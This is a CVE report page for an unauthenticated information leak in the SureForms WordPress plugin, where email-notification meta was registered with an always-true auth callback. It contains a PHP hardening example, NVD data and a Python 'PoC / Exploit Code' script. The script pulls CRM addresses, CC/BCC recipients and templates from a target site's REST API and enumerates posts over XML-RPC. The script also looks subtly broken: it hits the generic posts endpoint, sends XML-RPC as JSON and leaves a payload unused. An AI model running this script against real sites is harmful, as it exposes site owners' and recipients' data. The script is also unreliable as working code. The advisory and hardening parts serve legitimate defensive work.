Security Vulnerability Report
CVE-2025-12536 CVSS 5.3 MEDIUM

Published: 2025-11-13 04:15:46
Last Modified: 2026-04-15 00:35:42

Description

The SureForms plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.13.1 via the '_srfm_email_notification' post meta registration. This is due to setting the 'auth_callback' parameter to '__return_true', which allows unauthenticated access to the metadata. This makes it possible for unauthenticated attackers to extract sensitive data including email notification configurations, which frequently contain vendor-provided CRM/help desk dropbox addresses, CC/BCC recipients, and notification templates that can be abused to inject malicious data into downstream systems.
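The registration pattern the description points at, shown as an added example rather than SureForms' own code: a sensitive, underscore-prefixed post-meta key registered for the REST API with 'auth_callback' set to '__return_true', beside a hardened registration. The post type example_form, the meta key _example_email_notification, the capability names and the route namespace example/v1 are assumptions chosen for illustration, not identifiers from the plugin.

```php
<?php
/**
 * Added example (not SureForms code). Post type, meta key, capabilities and
 * route namespace are illustrative placeholders.
 */

// WEAK: a protected (underscore-prefixed) key holding recipient addresses and
// notification templates is registered for the REST API with an auth callback
// that always returns true. For a publicly readable post type the value is
// returned in the "meta" object of the post, so no authentication is needed
// to read it.
function example_register_email_meta_weak() {
    register_post_meta(
        'example_form',                 // hypothetical post type
        '_example_email_notification',  // hypothetical meta key
        array(
            'type'          => 'string',
            'single'        => true,
            'show_in_rest'  => true,
            'auth_callback' => '__return_true',
        )
    );
}

// HARDENED: (1) writes require a real capability instead of __return_true;
// (2) the key is not registered for REST at all, so it never appears in the
// public post object. In WordPress core, auth_callback is consulted for
// add/edit/delete capability checks on the key; keeping the key out of
// show_in_rest is what closes unauthenticated reads.
function example_register_email_meta_hardened() {
    register_post_meta(
        'example_form',
        '_example_email_notification',
        array(
            'type'          => 'string',
            'single'        => true,
            'show_in_rest'  => false,
            'auth_callback' => function () {
                return current_user_can( 'manage_options' );
            },
        )
    );
}

// If an authenticated editor UI genuinely needs the value over REST, expose it
// through a dedicated route with its own permission_callback rather than by
// attaching it to the public post object.
function example_register_private_meta_route() {
    register_rest_route(
        'example/v1',
        '/forms/(?P<id>\d+)/email-notification',
        array(
            'methods'             => 'GET',
            'permission_callback' => function ( WP_REST_Request $request ) {
                // Only users who may edit this specific form see its config.
                return current_user_can( 'edit_post', (int) $request['id'] );
            },
            'callback'            => function ( WP_REST_Request $request ) {
                $value = get_post_meta( (int) $request['id'], '_example_email_notification', true );
                return rest_ensure_response( array( 'email_notification' => $value ) );
            },
            'args'                => array(
                'id' => array( 'validate_callback' => 'is_numeric' ),
            ),
        )
    );
}

add_action( 'init', 'example_register_email_meta_hardened' );
add_action( 'rest_api_init', 'example_register_private_meta_route' );
```

When auditing a plugin for this class of issue, the two properties to check on every register_post_meta / register_meta call for a key that stores secrets are whether 'show_in_rest' is enabled on a post type that unauthenticated users can read, and whether 'auth_callback' is a real capability check rather than '__return_true'.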

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

SureForms WordPress Plugin <= 1.13.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2025-12536 PoC - SureForms Sensitive Information Exposure
# Target: WordPress site with SureForms plugin <= 1.13.1

TARGET_URL = "https://target-wordpress-site.com"


def exploit_cve_2025_12536():
    """
    Exploit for CVE-2025-12536: SureForms sensitive information disclosure
    via improper auth_callback configuration for '_srfm_email_notification' post meta.
    """
    # Step 1: Identify posts with SureForms data using REST API
    # The vulnerability allows unauthenticated access to post meta
    headers = {
        "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-12536-PoC)",
        "Content-Type": "application/json",
    }

    # Method 1: Using REST API to get post meta
    posts_endpoint = f"{TARGET_URL}/wp-json/wp/v2/posts"

    try:
        # Get list of posts
        response = requests.get(posts_endpoint, headers=headers, timeout=10)
        if response.status_code == 200:
            posts = response.json()
            for post in posts:
                post_id = post['id']
                # Method 2: Direct meta access via REST API
                meta_endpoint = f"{TARGET_URL}/wp-json/wp/v2/posts/{post_id}"
                meta_response = requests.get(meta_endpoint, headers=headers, timeout=10)
                if meta_response.status_code == 200:
                    post_data = meta_response.json()
                    # Check if _srfm_email_notification meta exists
                    if 'meta' in post_data:
                        email_config = post_data['meta'].get('_srfm_email_notification')
                        if email_config:
                            print(f"[*] Found sensitive data in post {post_id}")
                            print(f"[*] Email notification config: {json.dumps(email_config, indent=2)}")
                            # Extract sensitive information
                            if isinstance(email_config, dict):
                                crm_addresses = email_config.get('crm_addresses', [])
                                cc_recipients = email_config.get('cc', [])
                                bcc_recipients = email_config.get('bcc', [])
                                email_template = email_config.get('template', '')
                                print(f"[+] CRM Addresses: {crm_addresses}")
                                print(f"[+] CC Recipients: {cc_recipients}")
                                print(f"[+] BCC Recipients: {bcc_recipients}")
                                print(f"[+] Email Template: {email_template[:200]}...")

        # Method 3: Using XML-RPC if REST API is restricted
        xmlrpc_endpoint = f"{TARGET_URL}/xmlrpc.php"
        xmlrpc_payload = {
            "method": "metaWeblog.getPost",
            "params": [1, "", ""],
            "filter": {"post_id": 1},
        }
        # Alternative: Use wp.getPost with post ID enumeration
        for post_id in range(1, 100):
            xmlrpc_data = {
                "method": "wp.getPost",
                "params": [0, "", "", post_id],
            }
            try:
                xmlrpc_response = requests.post(
                    xmlrpc_endpoint,
                    json=xmlrpc_data,
                    headers={"Content-Type": "application/json"},
                    timeout=10,
                )
                if xmlrpc_response.status_code == 200:
                    result = xmlrpc_response.json()
                    if 'fault' not in result:
                        print(f"[*] Post {post_id} accessible via XML-RPC")
            except requests.RequestException:
                # Skip IDs that time out or return an unreadable response
                continue
    except requests.RequestException as e:
        print(f"[!] Error: {e}")
        return False


def main():
    print("=" * 60)
    print("CVE-2025-12536 PoC - SureForms Information Disclosure")
    print("=" * 60)
    exploit_cve_2025_12536()
    print("\n[!] Note: Ensure you have permission before testing")


if __name__ == "__main__":
    main()
```

References

https://plugins.trac.wordpress.org/browser/sureforms/tags/1.13.1/inc/post-types.php#L892
https://plugins.trac.wordpress.org/changeset/3391762/sureforms/trunk/inc/post-types.php
https://www.wordfence.com/threat-intel/vulnerabilities/id/9e8e239a-0ddf-479e-b94b-7844ff6e9e81?source=cve

Weakness: CWE-359
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12536",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-13T04:15:46.130",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The SureForms plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.13.1 via the '_srfm_email_notification' post meta registration. This is due to setting the 'auth_callback' parameter to '__return_true', which allows unauthenticated access to the metadata. This makes it possible for unauthenticated attackers to extract sensitive data including email notification configurations, which frequently contain vendor-provided CRM/help desk dropbox addresses, CC/BCC recipients, and notification templates that can be abused to inject malicious data into downstream systems."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-359"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/sureforms/tags/1.13.1/inc/post-types.php#L892",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3391762/sureforms/trunk/inc/post-types.php",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9e8e239a-0ddf-479e-b94b-7844ff6e9e81?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```